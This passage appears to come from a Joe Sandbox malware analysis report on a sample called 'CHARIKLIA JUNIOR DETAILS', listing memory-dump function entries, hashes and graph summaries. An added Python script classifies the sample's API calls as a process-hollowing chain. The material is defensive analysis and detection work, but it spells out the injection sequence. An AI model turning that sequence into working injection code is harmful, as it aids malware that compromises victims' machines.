                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0583A27D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 14637f11fa16732fd747bd649b2ad87d9254b2678e64a03a584b96b4bb7fb6a9
                                                              • Instruction ID: 1f9b66872302947d172f64cb624c572d5a7a2db173e8b816865f65d344486417
                                                              • Opcode Fuzzy Hash: 14637f11fa16732fd747bd649b2ad87d9254b2678e64a03a584b96b4bb7fb6a9
                                                              • Instruction Fuzzy Hash: 911122B58003099FCB10DF8AC885BDEBBF8EB48320F108419E959A3200C375A984CFA1
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0115AF5E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 534f86938827b70553ce6f2089995b133bb62f9f4bbcf1b826181a8354c3bdd4
                                                              • Instruction ID: d300ef1d043f937d7b7e7d19ab742b313d0891539841ec24e9aeb6d1438b728d
                                                              • Opcode Fuzzy Hash: 534f86938827b70553ce6f2089995b133bb62f9f4bbcf1b826181a8354c3bdd4
                                                              • Instruction Fuzzy Hash: A0110FB5C002498FDB14CF9AD844A9EFBF4AF88624F10851AD928A7250C379A545CFA1
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0583A27D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 1f77f48e6e47de3671be293fbb1d8fd58d4a223337b5662334eabb3d52ef8f2c
                                                              • Instruction ID: 732516b74ca1004e66ab56260f465146ce3a5de89e18e075684681d550e6aeeb
                                                              • Opcode Fuzzy Hash: 1f77f48e6e47de3671be293fbb1d8fd58d4a223337b5662334eabb3d52ef8f2c
                                                              • Instruction Fuzzy Hash: 491103B58003499FDB10DF9AD885BDEFBF8FB48720F108419E958A3250C375A944CFA1
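The call sites in the function entries above, all in the 05830000 dump (VirtualAllocEx at 0583777E, WriteProcessMemory at 05837860, ReadProcessMemory at 05837940, Wow64SetThreadContext at 058376B6, a ResumeThread entry that carries only its API ID, and PostMessageW with 00000010, which is WM_CLOSE), are the classic RunPE process-hollowing sequence issued by a 32-bit process, while the 01150000 dump only shows CreateActCtxA and DuplicateHandle. The Python below is an added example, not Joe Sandbox output and not the sample's code: it parses the report's call-site, "Offset:" and "API ID" lines (copied above into a constructed, abridged excerpt), recovers an API name from the API ID when an entry has no call-site line, and grades each dump region against a hollowing stage table. The stage table, the API ID word-matching heuristic and the WM_CLOSE decoding are this example's own assumptions about the report format, not Joe Sandbox logic.

```python
"""Reconstruct the remote-injection API chain from Joe Sandbox function
entries and classify it.  Added example for this report, not Joe Sandbox
code; the stage table and the WM_CLOSE decoding are this example's own."""
import re
from collections import defaultdict

# Constructed excerpt: the call-site, "Offset:" and "API ID" lines copied from
# the function entries of this report (Source File names abridged to "...").
# Joe prints them in this order for every entry, so the API ID line closes one.
REPORT_EXCERPT = """\
• CreateActCtxA.KERNEL32(?), ref: 011559A9
• Source File: ...sdmp, Offset: 01150000, based on PE: false
• API ID: Create
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05837860
• Source File: ...sdmp, Offset: 05830000, based on PE: false
• API ID: MemoryProcessWrite
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 058376B6
• Source File: ...sdmp, Offset: 05830000, based on PE: false
• API ID: ContextThreadWow64
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0115D677
• Source File: ...sdmp, Offset: 01150000, based on PE: false
• API ID: DuplicateHandle
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05837940
• Source File: ...sdmp, Offset: 05830000, based on PE: false
• API ID: MemoryProcessRead
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0583777E
• Source File: ...sdmp, Offset: 05830000, based on PE: false
• API ID: AllocVirtual
• Source File: ...sdmp, Offset: 05830000, based on PE: false
• API ID: ResumeThread
• PostMessageW.USER32(?,00000010,00000000,?), ref: 0583A27D
• Source File: ...sdmp, Offset: 05830000, based on PE: false
• API ID: MessagePost
"""

API_REF_RE = re.compile(r"^•\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
API_ID_RE = re.compile(r"API ID:\s*(\S*)")
WORD_RE = re.compile(r"[A-Z][a-z0-9]*")  # CamelCase word splitter

def parse_entries(text):
    """One dict per function entry: call sites, dump base address, Joe API ID."""
    entries, cur = [], {"apis": [], "region": None, "api_id": ""}
    for line in text.splitlines():
        line = line.strip()
        if m := API_REF_RE.match(line):
            cur["apis"].append({"api": m[1], "module": m[2],
                                "args": m[3].split(","), "ref": int(m[4], 16)})
        elif m := OFFSET_RE.search(line):
            cur["region"] = int(m[1], 16)
        elif m := API_ID_RE.search(line):
            cur["api_id"] = m[1]
            entries.append(cur)
            cur = {"apis": [], "region": None, "api_id": ""}
    return entries

def words(name):
    return set(WORD_RE.findall(name))

def infer_api(api_id, candidates):
    """Joe's API ID is built from words of the API name (MemoryProcessWrite for
    WriteProcessMemory); recover the name when the entry has no call-site line."""
    hits = [c for c in candidates if words(api_id) and words(api_id) <= words(c)]
    return hits[0] if len(hits) == 1 else None

# RunPE: allocate in the suspended child, write the payload, (optionally) read
# its PEB, point the main thread at the new entry, resume it.  Own assumption.
HOLLOWING_STAGES = [
    ("allocate", {"VirtualAllocEx"}),
    ("write", {"WriteProcessMemory"}),
    ("read", {"ReadProcessMemory"}),
    ("set-entry", {"SetThreadContext", "Wow64SetThreadContext"}),
    ("resume", {"ResumeThread"}),
]
REQUIRED_STAGES = {"allocate", "write", "set-entry", "resume"}
STAGE_APIS = set().union(*(apis for _, apis in HOLLOWING_STAGES))
WM_CLOSE = 0x0010  # second PostMessageW argument recovered in the report

def classify(entries):
    """Group APIs by memory-dump region and grade the injection chain."""
    by_region, notes = defaultdict(set), defaultdict(list)
    for e in entries:
        names = {a["api"] for a in e["apis"]}
        if not names and (guess := infer_api(e["api_id"], STAGE_APIS)):
            names.add(guess)  # e.g. the ResumeThread entries without a ref line
        by_region[e["region"]] |= names
        for a in e["apis"]:
            args = a["args"]
            if a["api"] == "PostMessageW" and len(args) > 1 and args[1] != "?" \
                    and int(args[1], 16) == WM_CLOSE:
                notes[e["region"]].append("PostMessageW sends WM_CLOSE")
    result = {}
    for region, names in by_region.items():
        stages = [s for s, apis in HOLLOWING_STAGES if names & apis]
        if REQUIRED_STAGES <= set(stages):
            verdict = "process hollowing chain complete"
        elif stages:
            verdict = "partial injection chain"
        else:
            verdict = "no injection primitives"
        result[region] = {"apis": sorted(names), "stages": stages,
                          "verdict": verdict, "notes": notes[region]}
    return result

if __name__ == "__main__":
    for region, r in sorted(classify(parse_entries(REPORT_EXCERPT)).items()):
        print(f"dump {region:08X}: {r['verdict']}; stages={r['stages']}; "
              f"notes={r['notes']}")
```

Grouping by dump region matters here: the injection primitives all resolve into the 05830000 dump, which is the unpacked stage, while the 01150000 dump holds only activation-context and handle-duplication calls. The API ID fallback is needed because Joe's ResumeThread entries in this report list no call-site address, so without it the chain would grade as partial. Treat the word-subset match as a heuristic: an ID such as "Create" matches nothing in the stage table and is deliberately left unresolved rather than guessed.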
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c9c4536e325249ff3d1d914eaa2cdfd0f42d51feafc04405f834a5e7d6080dd2
                                                              • Instruction ID: 203c298118c1439a63a11906103bb77a078ef0c843341502122d7eb242fb418c
                                                              • Opcode Fuzzy Hash: c9c4536e325249ff3d1d914eaa2cdfd0f42d51feafc04405f834a5e7d6080dd2
                                                              • Instruction Fuzzy Hash: 99213671504200DFDB01DF54D8C5B2ABFA1FB84718F20C1ADDA850B646C336D446CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 87f937f61afcc9947b834266ead1b43a841b358a342a1bf64e58be255f19896e
                                                              • Instruction ID: 71a4c8979b2806eccb44730c1f77806eae8f3c247410ed9cab6cf733132f58fe
                                                              • Opcode Fuzzy Hash: 87f937f61afcc9947b834266ead1b43a841b358a342a1bf64e58be255f19896e
                                                              • Instruction Fuzzy Hash: 75213671504304DFDB05DF44D9C5B5ABBA5FB84324F20C1ADEA490B646C73AF446CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413089844.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_110d000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f1bd8677a62078c4a537671aa0ad1a5fc566e7d19a822d029328bf8a46dd6d2
                                                              • Instruction ID: 0c673c6cc852253016fe53c17d72baafee5a59b48d5eb6d78e8615e9b7f840de
                                                              • Opcode Fuzzy Hash: 2f1bd8677a62078c4a537671aa0ad1a5fc566e7d19a822d029328bf8a46dd6d2
                                                              • Instruction Fuzzy Hash: C521F575A04304EFDF0ADF94E9C4B25BB65FB84324F20C56DE8494B296C3B6D446CA62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413089844.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_110d000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 25186ed0ce621b583bcedfaabaea0cb175a4fd649424a850ed4cc61b0020a5ad
                                                              • Instruction ID: 914e0fd2389c94d75b7ba95f6f90367a9ac4f0d222bb7b1735a7c3071f85d3da
                                                              • Opcode Fuzzy Hash: 25186ed0ce621b583bcedfaabaea0cb175a4fd649424a850ed4cc61b0020a5ad
                                                              • Instruction Fuzzy Hash: D4210375A04304DFDF1ADF94E884B16BB65FB84314F20C56DD84D4B28AC3B6D407CA62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                              • Instruction ID: 54e26bd903ef6a4e0fccc227cc795237853c4a5f9cd25dbe9179d021a6a1cbf3
                                                              • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                              • Instruction Fuzzy Hash: 1611CD76504240CFCB02CF44D5C0B56BFA2FB84224F2482ADD9490A657C33AE456CBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                              • Instruction ID: 5f3b27bd411becadc57ec4a45e1d369f806402c2820661cb842e464718003307
                                                              • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                              • Instruction Fuzzy Hash: 2D11CD76504280CFCB02CF54D5C4B16BFA2FB84624F2486ADD9490B656C33AD45ACBA2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413089844.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_110d000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                              • Instruction ID: b5a75fdc6aa4713968c64f86921be1042b24aca4326e4ab18d235321aeb9ca42
                                                              • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                              • Instruction Fuzzy Hash: 3E11BE75904284CFCB16CF54E5C4B15BB62FB44324F24C6A9D8494B69AC37AD40ACB62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413089844.000000000110D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0110D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_110d000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                              • Instruction ID: b832214ca1b7a0d2b060d1c2d9c9f0ed0ce59a33585e2c0856b7cba4ef20998b
                                                              • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                              • Instruction Fuzzy Hash: 6D11BB75904280DFCB06CF98D5C0B15BBA2FB84224F24C6ADD8494B696C37AD40ACB62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: db652e9a29d746c7a47c6ef244a0551ebbe24a85ea0aa1a072af749569e78edf
                                                              • Instruction ID: 734726fad148249a893a415ecb9f408913afba0a45a7a4346a46a04bf194c41a
                                                              • Opcode Fuzzy Hash: db652e9a29d746c7a47c6ef244a0551ebbe24a85ea0aa1a072af749569e78edf
                                                              • Instruction Fuzzy Hash: E101F2710043849BE7604AA5CCC5B6AFFD8FF81625F18C55EEE484EA86D3799840CBB2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413023247.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10fd000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6b5cac70e9d43b36c9e874b2cc8882fb35e97fc427cd46d9778e1e16e177c478
                                                              • Instruction ID: e56f24581bc13a2648bb98991f59da62fe1af4ba8f8d7c69a17bfc0de8d23498
                                                              • Opcode Fuzzy Hash: 6b5cac70e9d43b36c9e874b2cc8882fb35e97fc427cd46d9778e1e16e177c478
                                                              • Instruction Fuzzy Hash: 71F0C2310043849EE7508A0ACC84B62FFE8EF80634F18C49EEE484E296C279A844CBB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d120e0a418c7e00765de0388991123f09b92c3725536dbcc7110de5a9fa8c20c
                                                              • Instruction ID: 21cddf89273983dded63f71a0c3773ee3280a746933830c4ef6912adc50f8e16
                                                              • Opcode Fuzzy Hash: d120e0a418c7e00765de0388991123f09b92c3725536dbcc7110de5a9fa8c20c
                                                              • Instruction Fuzzy Hash: 81E1F874E002199FDB14DFA9C5819AEBBF2FF89304F248169E854AB355D731AD42CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb809feb56a53bc8585163ba746158568dc31b92faab41210f92812dd75b151d
                                                              • Instruction ID: daa1d466ad5200c7cb6f90db7ffa6f1d8ac9fb621de3451d87d8ef76dc337129
                                                              • Opcode Fuzzy Hash: eb809feb56a53bc8585163ba746158568dc31b92faab41210f92812dd75b151d
                                                              • Instruction Fuzzy Hash: 35E1E674E042198FDB14DFA9C581AAEBBF2FF89305F248169E814AB355D731AD41CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dc59f7f0f293332cc6cf9ede0c1620a97f4c0a3429461409922f43b46d90c423
                                                              • Instruction ID: d01bec78e647da0e08d0462a5119a993af7d7d88343cb4882b4c677983680f35
                                                              • Opcode Fuzzy Hash: dc59f7f0f293332cc6cf9ede0c1620a97f4c0a3429461409922f43b46d90c423
                                                              • Instruction Fuzzy Hash: 62E10974E002199FDB14DFA9C581AAEBBF2FF89305F248169D814AB355DB319D42CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c8af4d702d1f8a7e939b1575b36e620c5a2fd8098faf0bf75b5706581427475
                                                              • Instruction ID: 79a90c7b66c6cbfcf7338070f26a724c25ddbff12c79513bfbdc26e947d6e347
                                                              • Opcode Fuzzy Hash: 5c8af4d702d1f8a7e939b1575b36e620c5a2fd8098faf0bf75b5706581427475
                                                              • Instruction Fuzzy Hash: 10E10674E042198FDB14DF99C581AAEBBB2FF89305F248569E814AB315D730AD42CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc54d31c38bf01bf1126887fd98fd868dcaf8d4f36867274abc006c036e4e3d5
                                                              • Instruction ID: 05fbbaaefc2b386bace01705e2c5aacb9f24145821dd2d7301b0869873d76544
                                                              • Opcode Fuzzy Hash: fc54d31c38bf01bf1126887fd98fd868dcaf8d4f36867274abc006c036e4e3d5
                                                              • Instruction Fuzzy Hash: 23E10974E042198FDB14DF99C585AAEBBF2FF89305F248169E814A7315D731AD42CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413540836.0000000001150000.00000040.00000800.00020000.00000000.sdmp, Offset: 01150000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1150000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f265b839ac9e44f0541a3dfcf5c56a874c9781f8ae89cfe95bee1a58c6101816
                                                              • Instruction ID: dc16ef9975ff605265b50032d9bc7962918a7473ba75b1d6ec75ff2bec7e9682
                                                              • Opcode Fuzzy Hash: f265b839ac9e44f0541a3dfcf5c56a874c9781f8ae89cfe95bee1a58c6101816
                                                              • Instruction Fuzzy Hash: B8A1A532E1020ACFCF19DFB4C88459EBBB6FF85304B1545A9ED11AB255DB71E916CB40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 19417f5a45bcbf72721d98821a82f7e691e727ee644e3ea7c5ad332f15ed1727
                                                              • Instruction ID: b8da3b0e0836605d9d5f3c3444fca8846020f11c75bf29907c0a4101eed7d076
                                                              • Opcode Fuzzy Hash: 19417f5a45bcbf72721d98821a82f7e691e727ee644e3ea7c5ad332f15ed1727
                                                              • Instruction Fuzzy Hash: 25511670E142198BDB14DFA9C9856AEFBF2FF89205F248169D818A7315DB319D42CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7c8aadc55893ba39b53f3f246429fbb9cbef211b44aafcf948e02c4926cbf53
                                                              • Instruction ID: ed049160cf102b85be4600725b691c018b5b750e0588cb05a8a23f5867a738c6
                                                              • Opcode Fuzzy Hash: e7c8aadc55893ba39b53f3f246429fbb9cbef211b44aafcf948e02c4926cbf53
                                                              • Instruction Fuzzy Hash: E4511971E042199BDB14DFA9C5815AEFBF2BF89305F24C169D818AB315D7319D42CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1428706861.0000000005830000.00000040.00000800.00020000.00000000.sdmp, Offset: 05830000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5830000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7f9c365cabd831ce1deed3137ef0700bfba98d5539079b22dbb030d18c02cc4
                                                              • Instruction ID: b05d21af7682b95e6e596d806b030dde27924f7f232d0b1d016f0cac318beed3
                                                              • Opcode Fuzzy Hash: d7f9c365cabd831ce1deed3137ef0700bfba98d5539079b22dbb030d18c02cc4
                                                              • Instruction Fuzzy Hash: D5513674E002198FDB14DFA9C6815AEBBF2BF89304F24816AD858AB315D7319D46CFA0

                                                              Execution Graph

                                                              Execution Coverage:10.6%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:95
                                                              Total number of Limit Nodes:10
                                                              [Execution graph data omitted: serialized node and edge list of the rendered graph (node IDs with start addresses and caller->callee edges). Windows API calls named on the graph: GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CallWindowProcW, GlobalMemoryStatusEx, GetModuleHandleW, CreateWindowExW, DuplicateHandle]

                                                              Control-flow Graph

                                                              [Control-flow graph data omitted: basic-block node and edge list of the rendered graph for the function starting at 6df55a0; executed and not-executed blocks were distinguished by colour in the rendered figure]
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $
                                                              • API String ID: 0-3993045852
                                                              • Opcode ID: cc52bf1fa63e87a06eddf1ca2aa4b169f6bdc8c0f52c6e4318f4a78c546109a9
                                                              • Instruction ID: a741c7e1493c67c7e88b0792ba87bfb646185f6b2e8bbd526f960bf8ac2e1b12
                                                              • Opcode Fuzzy Hash: cc52bf1fa63e87a06eddf1ca2aa4b169f6bdc8c0f52c6e4318f4a78c546109a9
                                                              • Instruction Fuzzy Hash: EC22D371F20215CFDF64DBA4E4406AEBBB2FF98320F25856AD905AB350DA31DC42CB90
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9924ec8e773ed3ebe8d9a78ab8ede04bae2f0de28f7da75e7c84a6543af29b8a
                                                              • Instruction ID: 504115a31c9304c53b19948b94ab2365bd52b50a49bfc4860c78aac03f243c7a
                                                              • Opcode Fuzzy Hash: 9924ec8e773ed3ebe8d9a78ab8ede04bae2f0de28f7da75e7c84a6543af29b8a
                                                              • Instruction Fuzzy Hash: 60D24A30E10209CFDB64DBA8C594A9DB7B2FF89310F56C5AAD509AB351DB35ED81CB80
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe71b0091461a0528252b358a502ef067bda87a277327e886655088e42f99c62
                                                              • Instruction ID: be167ca30713aa6d2f8c9cc2e12dbad61c283ac99b752d2b98d99dd0500d2cf4
                                                              • Opcode Fuzzy Hash: fe71b0091461a0528252b358a502ef067bda87a277327e886655088e42f99c62
                                                              • Instruction Fuzzy Hash: 82628C34B20249DFDB54DB68D984BADBBB2EF84310F158469E905EB790DB35EC42CB90
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 66fb9e9a695b28008445649404a2d30095e42b692e17f40fef9636d794a79df1
                                                              • Instruction ID: 2accbb8abc2f1d9de6bc47bb215bd615600052ed28f1d4b3626df0e147b92df4
                                                              • Opcode Fuzzy Hash: 66fb9e9a695b28008445649404a2d30095e42b692e17f40fef9636d794a79df1
                                                              • Instruction Fuzzy Hash: 34525D70E202098FEF64DB69D4847AEB7B2FB89310F25852AE505EB351DB35DC81CB91
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_6df0000_CHARIKLIA JUNIOR DETAILS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3eec2836300e404c57920a867acc0177a89a09ed684bb749772adadd4c2744d5
                                                              • Instruction ID: 6ca02bbba1dbb37c7af6a2183ff4d4f5c44b43555df00b852ce0ee532fe0b0f2
                                                              • Opcode Fuzzy Hash: 3eec2836300e404c57920a867acc0177a89a09ed684bb749772adadd4c2744d5
                                                              • Instruction Fuzzy Hash: 52329074B202098FDF54DB68E884BAEB7B2FB88310F118525D905EB351DB35EC52CB91
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.3866116642.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
